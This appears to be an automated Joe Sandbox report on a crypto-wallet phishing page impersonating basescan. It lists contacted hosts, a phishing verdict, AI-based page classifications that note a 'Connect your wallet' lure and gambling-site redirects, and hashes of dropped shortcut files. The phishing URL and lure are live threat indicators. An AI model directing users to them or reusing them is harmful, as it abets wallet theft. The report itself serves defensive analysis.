                                                                                                                                                                                                                                              scripts.prdredir.comUnited States
                                                                                                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                              3.126.230.177
                                                                                                                                                                                                                                              relay.walletconnect.orgUnited States
                                                                                                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                                                                                                              104.17.25.14
                                                                                                                                                                                                                                              cdnjs.cloudflare.comUnited States
                                                                                                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                              172.66.44.171
                                                                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                              104.26.13.113
                                                                                                                                                                                                                                              basescan.orgUnited States
                                                                                                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                              172.67.136.218
                                                                                                                                                                                                                                              pixel.mediamathrdrt.comUnited States
                                                                                                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                              139.45.195.8
                                                                                                                                                                                                                                              my.rtmark.netNetherlands
                                                                                                                                                                                                                                              9002RETN-ASEUfalse
                                                                                                                                                                                                                                              104.18.9.186
                                                                                                                                                                                                                                              bcgame.skUnited States
                                                                                                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                              54.207.213.8
                                                                                                                                                                                                                                              cms.getblue.ioUnited States
                                                                                                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                                                                                                              104.26.12.113
                                                                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                              37.252.172.123
                                                                                                                                                                                                                                              unknownEuropean Union
                                                                                                                                                                                                                                              29990ASN-APPNEXUSfalse
                                                                                                                                                                                                                                              104.18.31.27
                                                                                                                                                                                                                                              pixel.prdredir.comUnited States
                                                                                                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                              142.250.185.162
                                                                                                                                                                                                                                              cm.g.doubleclick.netUnited States
                                                                                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                                                                                              143.204.205.213
                                                                                                                                                                                                                                              d107ul3j3wrui0.cloudfront.netUnited States
                                                                                                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                                                                                                              146.190.146.237
                                                                                                                                                                                                                                              a.ixncdn.comUnited States
                                                                                                                                                                                                                                              702UUNETUSfalse
                                                                                                                                                                                                                                              104.21.65.129
                                                                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                              18.229.151.144
                                                                                                                                                                                                                                              event.getblue.ioUnited States
                                                                                                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                                                                                                              104.18.29.72
                                                                                                                                                                                                                                              api.web3modal.comUnited States
                                                                                                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                              143.204.205.175
                                                                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                                                                                                              104.17.24.14
                                                                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                              172.67.69.250
                                                                                                                                                                                                                                              eas.etherscan.comUnited States
                                                                                                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                              104.21.94.142
                                                                                                                                                                                                                                              scripts.mediamathrdrt.comUnited States
                                                                                                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                              167.235.116.131
                                                                                                                                                                                                                                              stats-dss4061-serving.comUnited States
                                                                                                                                                                                                                                              3525ALBERTSONSUSfalse
                                                                                                                                                                                                                                              151.101.65.229
                                                                                                                                                                                                                                              jsdelivr.map.fastly.netUnited States
                                                                                                                                                                                                                                              54113FASTLYUSfalse
                                                                                                                                                                                                                                              151.101.2.208
                                                                                                                                                                                                                                              dualstack.com.imgix.map.fastly.netUnited States
                                                                                                                                                                                                                                              54113FASTLYUSfalse
                                                                                                                                                                                                                                              104.19.229.21
                                                                                                                                                                                                                                              api.hcaptcha.comUnited States
                                                                                                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                              188.114.96.3
                                                                                                                                                                                                                                              api.hypelab.comEuropean Union
                                                                                                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                              IP
                                                                                                                                                                                                                                              192.168.2.4
                                                                                                                                                                                                                                              192.168.2.5
                                                                                                                                                                                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                                              Analysis ID:1521025
                                                                                                                                                                                                                                              Start date and time:2024-09-28 03:14:56 +02:00
                                                                                                                                                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                              Overall analysis duration:0h 4m 42s
                                                                                                                                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                              Report type:full
                                                                                                                                                                                                                                              Cookbook file name:browseurl.jbs
                                                                                                                                                                                                                                              Sample URL:http://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/
                                                                                                                                                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                              Number of analysed new started processes analysed:8
                                                                                                                                                                                                                                              Number of new started drivers analysed:0
                                                                                                                                                                                                                                              Number of existing processes analysed:0
                                                                                                                                                                                                                                              Number of existing drivers analysed:0
                                                                                                                                                                                                                                              Number of injected processes analysed:0
                                                                                                                                                                                                                                              Technologies:
                                                                                                                                                                                                                                              • HCA enabled
                                                                                                                                                                                                                                              • EGA enabled
                                                                                                                                                                                                                                              • AMSI enabled
                                                                                                                                                                                                                                              Analysis Mode:default
                                                                                                                                                                                                                                              Analysis stop reason:Timeout
                                                                                                                                                                                                                                              Detection:MAL
                                                                                                                                                                                                                                              Classification:mal64.phis.win@23/1171@220/47
                                                                                                                                                                                                                                              EGA Information:Failed
                                                                                                                                                                                                                                              HCA Information:
                                                                                                                                                                                                                                              • Successful, ratio: 100%
                                                                                                                                                                                                                                              • Number of executed functions: 0
                                                                                                                                                                                                                                              • Number of non-executed functions: 0
                                                                                                                                                                                                                                              Cookbook Comments:
                                                                                                                                                                                                                                              • Browse: https://goto.etherscan.com/rd/Q4JDBVEF2UBQFTMWKMDBF4T69
                                                                                                                                                                                                                                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                                                                                                                                                                                              • Excluded IPs from analysis (whitelisted): 142.250.184.195, 142.250.110.84, 142.250.181.238, 34.104.35.123, 104.18.186.31, 104.18.187.31, 142.250.186.40, 142.250.185.234, 142.250.181.234, 216.58.206.42, 142.250.185.106, 142.250.185.138, 216.58.206.74, 142.250.184.234, 172.217.18.10, 142.250.186.42, 142.250.185.202, 142.250.185.170, 142.250.184.202, 142.250.186.170, 172.217.16.138, 142.250.185.74, 216.58.212.170, 2.16.100.168, 88.221.110.91, 4.175.87.197, 142.250.185.72, 192.229.221.95, 20.3.187.198, 13.85.23.206, 172.217.23.106, 172.217.16.202, 142.250.186.74, 142.250.186.138, 172.217.18.106, 142.250.186.99, 142.250.186.168, 64.233.184.84, 66.102.1.84, 142.250.186.106, 142.250.74.202, 199.232.210.172, 37.157.2.228, 37.157.3.26, 37.157.2.229, 37.157.2.233, 37.157.2.230, 37.157.3.20
                                                                                                                                                                                                                                              • Excluded domains from analysis (whitelisted): cdn.jsdelivr.net.cdn.cloudflare.net, slscr.update.microsoft.com, clientservices.googleapis.com, a767.dspw65.akamai.net, clients2.google.com, ocsp.digicert.com, www.googletagmanager.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, update.googleapis.com, s2.adformnet.akadns.net, a1.adformnet.akadns.net, wu-b-net.trafficmanager.net, www.google-analytics.com, glb.sls.prod.dcat.dsp.trafficmanager.net, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, download.windowsupdate.com.edgesuite.net, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, edgedl.me.gvt1.com, xandr-g-geo.trafficmanager.net, clients.l.google.com
                                                                                                                                                                                                                                              • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                              • Report size exceeded maximum capacity and may have missing network information.
                                                                                                                                                                                                                                              • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                              No simulations
                                                                                                                                                                                                                                              InputOutput
                                                                                                                                                                                                                                              URL: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/ Model: jbxai
                                                                                                                                                                                                                                              {
                                                                                                                                                                                                                                              "brand":["WalletConnect"],
                                                                                                                                                                                                                                              "contains_trigger_text":true,
                                                                                                                                                                                                                                              "trigger_text":"Connect your wallet.",
                                                                                                                                                                                                                                              "prominent_button_name":"Connect",
                                                                                                                                                                                                                                              "text_input_field_labels":"unknown",
                                                                                                                                                                                                                                              "pdf_icon_visible":false,
                                                                                                                                                                                                                                              "has_visible_captcha":false,
                                                                                                                                                                                                                                              "has_urgent_text":false,
                                                                                                                                                                                                                                              "has_visible_qrcode":false}
                                                                                                                                                                                                                                              URL: https://bcgame.sk/?spin=true&i=p3uc729n&utm_source=p3uc729n Model: jbxai
                                                                                                                                                                                                                                              {
                                                                                                                                                                                                                                              "brand":["BC.GAME"],
                                                                                                                                                                                                                                              "contains_trigger_text":false,
                                                                                                                                                                                                                                              "trigger_text":"",
                                                                                                                                                                                                                                              "prominent_button_name":"Accept",
                                                                                                                                                                                                                                              "text_input_field_labels":["BC Originals"],
                                                                                                                                                                                                                                              "pdf_icon_visible":false,
                                                                                                                                                                                                                                              "has_visible_captcha":false,
                                                                                                                                                                                                                                              "has_urgent_text":false,
                                                                                                                                                                                                                                              "has_visible_qrcode":false}
                                                                                                                                                                                                                                              URL: https://bcgame.sk/?spin=true&i=p3uc729n&utm_source=p3uc729n Model: jbxai
                                                                                                                                                                                                                                              {
                                                                                                                                                                                                                                              "brand":["BC.GAME"],
                                                                                                                                                                                                                                              "contains_trigger_text":true,
                                                                                                                                                                                                                                              "trigger_text":"Sign Up & Get UP TO $20,
                                                                                                                                                                                                                                              000.00",
                                                                                                                                                                                                                                              "prominent_button_name":"Sign Up",
                                                                                                                                                                                                                                              "text_input_field_labels":["BC Originals",
                                                                                                                                                                                                                                              "All",
                                                                                                                                                                                                                                              "BC Originals",
                                                                                                                                                                                                                                              "Slots",
                                                                                                                                                                                                                                              "Live Casino"],
                                                                                                                                                                                                                                              "pdf_icon_visible":false,
                                                                                                                                                                                                                                              "has_visible_captcha":false,
                                                                                                                                                                                                                                              "has_urgent_text":false,
                                                                                                                                                                                                                                              "has_visible_qrcode":false}
                                                                                                                                                                                                                                              URL: https://bcgame.sk/?spin=true&i=p3uc729n&utm_source=p3uc729n Model: jbxai
                                                                                                                                                                                                                                              {
                                                                                                                                                                                                                                              "brand":["BC.GAME"],
                                                                                                                                                                                                                                              "contains_trigger_text":true,
                                                                                                                                                                                                                                              "trigger_text":"Sorry!",
                                                                                                                                                                                                                                              "prominent_button_name":"Accept",
                                                                                                                                                                                                                                              "text_input_field_labels":["Privacy Policy"],
                                                                                                                                                                                                                                              "pdf_icon_visible":false,
                                                                                                                                                                                                                                              "has_visible_captcha":false,
                                                                                                                                                                                                                                              "has_urgent_text":false,
                                                                                                                                                                                                                                              "has_visible_qrcode":false}
                                                                                                                                                                                                                                              URL: https://bcgame.sk/?spin=true&i=p3uc729n&utm_source=p3uc729n Model: jbxai
                                                                                                                                                                                                                                              {
                                                                                                                                                                                                                                              "brand":["BC.GAME"],
                                                                                                                                                                                                                                              "contains_trigger_text":true,
                                                                                                                                                                                                                                              "trigger_text":"Sorry It looks like you're trying to access BCGAME.SK from a restricted area!",
                                                                                                                                                                                                                                              "prominent_button_name":"Accept",
                                                                                                                                                                                                                                              "text_input_field_labels":["Privacy Policy"],
                                                                                                                                                                                                                                              "pdf_icon_visible":false,
                                                                                                                                                                                                                                              "has_visible_captcha":false,
                                                                                                                                                                                                                                              "has_urgent_text":false,
                                                                                                                                                                                                                                              "has_visible_qrcode":false}
                                                                                                                                                                                                                                              URL: https://bcgame.sk/?spin=true&i=p3uc729n&utm_source=p3uc729n Model: jbxai
                                                                                                                                                                                                                                              {
                                                                                                                                                                                                                                              "brand":["BC.GAME"],
                                                                                                                                                                                                                                              "contains_trigger_text":true,
                                                                                                                                                                                                                                              "trigger_text":"Sorry,
                                                                                                                                                                                                                                               It looks like you're trying to access BCGAME.SK from a restricted area!",
                                                                                                                                                                                                                                              "prominent_button_name":"Privacy Policy",
                                                                                                                                                                                                                                              "text_input_field_labels":["Privacy Policy"],
                                                                                                                                                                                                                                              "pdf_icon_visible":false,
                                                                                                                                                                                                                                              "has_visible_captcha":false,
                                                                                                                                                                                                                                              "has_urgent_text":false,
                                                                                                                                                                                                                                              "has_visible_qrcode":false}
                                                                                                                                                                                                                                              URL: https://bcgame.sk/?spin=true&i=p3uc729n&utm_source=p3uc729n Model: jbxai
                                                                                                                                                                                                                                              {
                                                                                                                                                                                                                                              "brand":["BC.GAME"],
                                                                                                                                                                                                                                              "contains_trigger_text":true,
                                                                                                                                                                                                                                              "trigger_text":"Sorry,
                                                                                                                                                                                                                                               It looks like you're trying to access BCGAME.SK from a restricted area!",
                                                                                                                                                                                                                                              "prominent_button_name":"Accept",
                                                                                                                                                                                                                                              "text_input_field_labels":"unknown",
                                                                                                                                                                                                                                              "pdf_icon_visible":false,
                                                                                                                                                                                                                                              "has_visible_captcha":false,
                                                                                                                                                                                                                                              "has_urgent_text":false,
                                                                                                                                                                                                                                              "has_visible_qrcode":false}
                                                                                                                                                                                                                                              No context
                                                                                                                                                                                                                                              No context
                                                                                                                                                                                                                                              No context
                                                                                                                                                                                                                                              No context
                                                                                                                                                                                                                                              No context
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sat Sep 28 00:15:52 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):2677
                                                                                                                                                                                                                                              Entropy (8bit):3.9831685165778454
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:48:8rdATk4UHgeidAKZdA19ehwiZUklqeh2y+3:8mvx0By
                                                                                                                                                                                                                                              MD5:EB0907DDAD29A674013D36F8C017D41A
                                                                                                                                                                                                                                              SHA1:9A1413DCB38F10E1DE20AD24921180F3A32DAA8A
                                                                                                                                                                                                                                              SHA-256:7A5F57C73C4633BA8ADA36FC16177ECF88FCE91DF6910A6371D8B0A60556A5C5
                                                                                                                                                                                                                                              SHA-512:73CB8F780716D4D92514D81175E1D6D329383CA6C08F820F3819CFDBAC8A55285F9C84FFE49340471201DCB08C82ABD91C884CAD0AD8391D68462D1DA467EAB1
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:L..................F.@.. ...$+.,....w...C...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I<Y......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V<Y......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V<Y......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V<Y............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V<Y.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sat Sep 28 00:15:52 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):2679
                                                                                                                                                                                                                                              Entropy (8bit):3.995493591098
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:48:8hdATk4UHgeidAKZdA1weh/iZUkAQkqehxy+2:8svxG9QEy
                                                                                                                                                                                                                                              MD5:2CB7025CBB591D6B71CDD83093455B81
                                                                                                                                                                                                                                              SHA1:86CFA309B3E9CA4FFD5A97644CB32F3949D9DA3A
                                                                                                                                                                                                                                              SHA-256:3E47355C76E37E028C4EB8186D667D63B15F4CFF78E400C6BB8D049EB3100093
                                                                                                                                                                                                                                              SHA-512:4BD6A38357812635D976747BA8616393AE7D5BA53AE85B112614125489EE2B3A97ECE1BD217652BD1B1AC1F2DA22C318293A616F3470877B8B7968DD505FA935
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:L..................F.@.. ...$+.,....SA..C...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I<Y......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V<Y......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V<Y......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V<Y............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V<Y.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 4 12:54:07 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):2693
                                                                                                                                                                                                                                              Entropy (8bit):4.011829530251543
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:48:8xZdATk4sHgeidAKZdA14tseh7sFiZUkmgqeh7sny+BX:8x0v5undy
                                                                                                                                                                                                                                              MD5:4A215CFDECC1C3FB83B9E54C924BD02F
                                                                                                                                                                                                                                              SHA1:5030D55987C74C95B9DB6391E148F28B2C906251
                                                                                                                                                                                                                                              SHA-256:DECCA30073CD9874B98DDFF8EEBDE5BADF7FF9467C7AD9757CC0EA98186FEB17
                                                                                                                                                                                                                                              SHA-512:DC5C76968070F59BD135AAD7B586F38CA71ED57A76A0E870F25A5E82D97F74165606A8EC355C0F3F3592AC1FE616031C00450236C5BBE5A0642162A800B0C4B3
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:L..................F.@.. ...$+.,......e>....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I<Y......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V<Y......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V<Y......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V<Y............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VDW.n...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sat Sep 28 00:15:52 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):2681
                                                                                                                                                                                                                                              Entropy (8bit):3.99705035551354
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:48:8UdATk4UHgeidAKZdA1vehDiZUkwqehFy+R:8fvxNvy
                                                                                                                                                                                                                                              MD5:D61D87A287ACD5AE92FFCF17958DE3BD
                                                                                                                                                                                                                                              SHA1:48F0CFB26E65C076D55D451BF95F66422DF3931E
                                                                                                                                                                                                                                              SHA-256:16B7D8A337E095A6BE58C618767BE9BCB225BE5F0D16392D871B74D9C4BCCC66
                                                                                                                                                                                                                                              SHA-512:46EECE3A9CFEDD65675ADCB11E39D8BEC05930965565CB0101C58D355E2F843C7FC0243744C2F6F374329B938C5422398B8D3B60B667160726C7B73860FB07EF
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:L..................F.@.. ...$+.,.....$..C...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I<Y......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V<Y......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V<Y......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V<Y............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V<Y.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sat Sep 28 00:15:52 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):2681
                                                                                                                                                                                                                                              Entropy (8bit):3.987285469282379
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:48:8AdATk4UHgeidAKZdA1hehBiZUk1W1qehTy+C:8zvxN9zy
                                                                                                                                                                                                                                              MD5:8926BB21FFEBC8BD7766085C980FCBAD
                                                                                                                                                                                                                                              SHA1:486931B9CCEC8FE1F980EF6DBEA91B02E74D7FE1
                                                                                                                                                                                                                                              SHA-256:10BDFE6881EC9CD8049333E9F1C385C7917207603C5A2ED666FAB6F97A7D67F8
                                                                                                                                                                                                                                              SHA-512:83AB17C8AE74CA941D81CAD9D23F3F2BE627E965DF63CE9AD8E8998659E96E85605E80C3C5A66EF6831E18C856915D26DCBC645622088475FD0633EB2582C5CF
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:L..................F.@.. ...$+.,....z...C...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I<Y......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V<Y......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V<Y......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V<Y............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V<Y.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sat Sep 28 00:15:52 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):2683
                                                                                                                                                                                                                                              Entropy (8bit):3.9970857812235185
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:48:8fodATk4UHgeidAKZdA1duT+ehOuTbbiZUk5OjqehOuTbdy+yT+:8fLvxRT/TbxWOvTbdy7T
                                                                                                                                                                                                                                              MD5:0B94438D086F4998DD2ECCFF011DEF03
                                                                                                                                                                                                                                              SHA1:ADAECD91ECE861707058B6716C1F1FDA73B952B2
                                                                                                                                                                                                                                              SHA-256:6B1BD6DCC74741675C6F64618F1DD8D6D66D387DCF539E0C29873A6EF94C7A06
                                                                                                                                                                                                                                              SHA-512:2CD0A86F288F5F3446F29EB0AE8239BAC3067014370D5497DA4AF1D908508C4AD4C7BF8D30C189D006ED97B0515F4EA8C33E8F582605FE5E17AA498DB37054C7
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
